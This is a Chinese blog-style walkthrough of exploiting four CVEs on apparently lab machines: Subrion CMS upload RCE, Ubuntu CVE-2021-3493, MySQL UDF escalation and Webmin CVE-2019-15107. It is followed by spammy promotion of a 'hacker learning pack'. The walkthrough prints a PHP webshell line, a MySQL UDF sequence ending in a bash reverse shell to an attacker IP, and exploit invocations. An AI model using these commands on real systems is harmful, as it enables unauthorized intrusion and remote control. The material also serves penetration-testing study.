别光盯着最新的0day了,咱也得温故而知新,捡几个CVE漏洞出来溜溜!
神兵利器:DecryptTools 数据库密码破解一把梭!
代码审计?用铲子 SATST 挖地三尺,不放过任何 Bug!
一、CVE-2018-29422:Subrion CMS 文件上传,一不小心就 RCE 了!
目标:venom
先给 venom.box 安排个域名解析,方便咱们下手。
点它!
哟,登录界面,还贴心地告诉你系统版本:Subrion CMS v4.2.1,简直是送温暖!
image-20250312153555716
赶紧 Google 一下,发现历史漏洞一枚:文件上传 RCE,安排!
image-20250312153755215
下载下来仔细研究:
参考文章:https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE
一顿操作猛如虎:
sudo python3 49876.py -u http://venom.box/panel/ -l dora -p E7r9t8@Q#h%Hy+M1234
Shell 是拿到了,但是非交互模式,差评!
换个姿势,直接登录管理面板,密码是维吉尼亚解密密码,够骚!
成功上位,管理员权限到手!进设置瞅瞅:
既然有文件上传 RCE 漏洞,那就后台找找文件上传点,安排!
Bingo!发现一处,可以上传!
image-20250312155354469
点它!
image-20250312155446078
先拿 txt 文件试试水,上传成功!
image-20250312155542068
上 php 文件,结果...被过滤了,看来没那么容易。
track <?php system($_GET["a"]); ?>
看路径!
image-20250312155917497
漏洞利用代码里给了提示,要用 pht 或 phar 后缀!
exp文章:https://github.com/intelliants/subrion/issues/801
image-20250312165130284
安排!在这个网站生成反弹 shell:https://www.ddosi.org/shell/
新建 .pht 文件上传,访问路径,攻击机监听端口,反弹成功!
image-20250312170506847
二、CVE-2021-3493:Ubuntu 低版本内核提权,菜鸡也能变大佬!
目标:venom
继续考古,搜索历史漏洞!
image-20250312170937361
下载下来研究:
image-20250312171341391
使用方法安排上:
image-20250312171249834
开启 web 服务,靶机下载脚本!
image-20250312171518442
结果...执行失败,赋权也不行,看来姿势不对!
image-20250312172158480
换个 exp,在这个网站找到:
exp文章:https://github.com/briskets/CVE-2021-3493
下载到 kali!
image-20250312172439048
Kali 开启 web 服务,靶机用 wget 下载,赋权、编译、执行,一气呵成!
提权成功!进 **/root 目录,找到 flag!
image-20250312172519193
三、CVE-2016-6662:MySQL UDF 提权,数据库也能玩出花!
先瞅瞅系统是 64 位还是 32 位,这决定你用哪个 UDF 文件!
目标:sundown
64 位!再看看 secure_file_priv 是不是空的,这决定 MySQL 对导入导出有没有限制!
show global variables like 'secure%';
没回显!
看看具体信息:
- NULL:不允许导入导出,GG
- /tmp/:只能在 /tmp/ 搞,GG
- 空:随便搞,冲!
MySQL 版本 >=5.1,UDF 要传到 mysqllibplugin 目录,用 show variables like "%plugin%" 看看!(没有就自己建一个)
查路径!
show variables like '%plugin%'; 路径:/usr/lib/x86_64-linux-gnu/mariadb19/plugin/
信息都到位了,开始提权!Kali 到 /usr/share/metasploit-framework/data/exploits/mysql 目录,复制 64 位的 UDF 文件到本地!
Kali 开启 web 服务,传文件!
上传成功!
回到靶机,进 /tmp 目录!
回到数据库,执行命令,看看 MySQL 数据库下的表信息!
执行下面的命令:
create table shell(line blob); # 需要为blob,因为是二进制对象存储容器,存储下面load_file的返回值
insert into shell values(load_file('/tmp/lib_mysqludf_sys_64.so')); # 插入并存储load_file的返回值
写入文件,创建函数,反弹 Shell!
select * from shell into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so'; # 将/tmp/udf文件写入到plugin里
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; # 创建函数于udf文件中加载
select sys_exec('bash -c "bash -i >& /dev/tcp/192.168.108.130/4444 0>&1"'); # 调用函数执行反弹shell
开启监听端口,执行,成功反弹 Shell!
四、CVE-2019-15107:Webmin 远程命令执行,不登录也能 Get Shell!
目标:Source
访问 10000 端口,是个登录网站,源码和指纹没啥利用价值!
想到刚才找到的版本号,查查历史漏洞!
下载下来看看,要结合 MSF 才能用!
上网搜搜,参考文章:
https://github.com/squid22/Webmin_CVE-2019-15107 https://github.com/jas502n/CVE-2019-15107?tab=readme-ov-file
下载 exp 到 Kali!
赋权!
开启监听端口,执行脚本!
./webmin_exploit.py 192.168.108.154 10000 192.168.108.130 4444
Root 权限到手!
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************